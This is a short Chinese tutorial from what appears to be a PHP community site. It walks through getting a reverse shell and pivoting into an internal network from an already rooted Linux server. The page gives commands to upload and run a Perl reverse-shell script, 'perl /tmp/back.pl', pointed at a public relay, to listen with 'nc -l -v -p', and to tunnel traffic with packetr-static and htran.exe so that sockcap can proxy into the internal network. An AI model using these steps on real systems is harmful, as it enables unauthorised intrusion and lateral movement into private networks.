当前位置:  首页  >  服务器技术  >  Linux/unix  >  Linux教程

推荐:Linux下的内网反弹实例详解

推荐:Linux下的内网反弹实例详解被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器192.168.0.105hack的操作用机-----我的电脑192.168.1.101
环境: 被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105 hack的操作用机-----我的电脑 192.168.1.101 反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx 渗透测试用的windows测试机   192.168.1.109 工具: packetr-static   Linux下的 htran.exe windows下的 sockcap 用作代理进入内网渗透的利器 过程: 1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的 上传back.pl文件到linux下的tmp目录下,执行 perl /tmp/back.pl xxx.xxx.xxx.xxx 端口 在公网的服务器上,运行nc执行 nc -l -v -p 端口(跟上面的一样) 现在我弹2个窗口回来,一个开代理,一个转发数据 把packetr-static传上去,执行 ./packetr-static -s 1988
一个窗口转发数据,执行
./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988
2.在windows公网端执行,
htran.exe -p -listen 123 1988
3.配置sockcap

4.运行代理程序进入内网
吐了个 "CAO" !
扫码关注 PHP1 官方微信号
PHP1.CN | 中国最专业的PHP中文社区 | 凯发国际娱乐 | 凯发国际娱乐下载 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | PHP问答
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved PHP1.CN 第一PHP社区 版权所有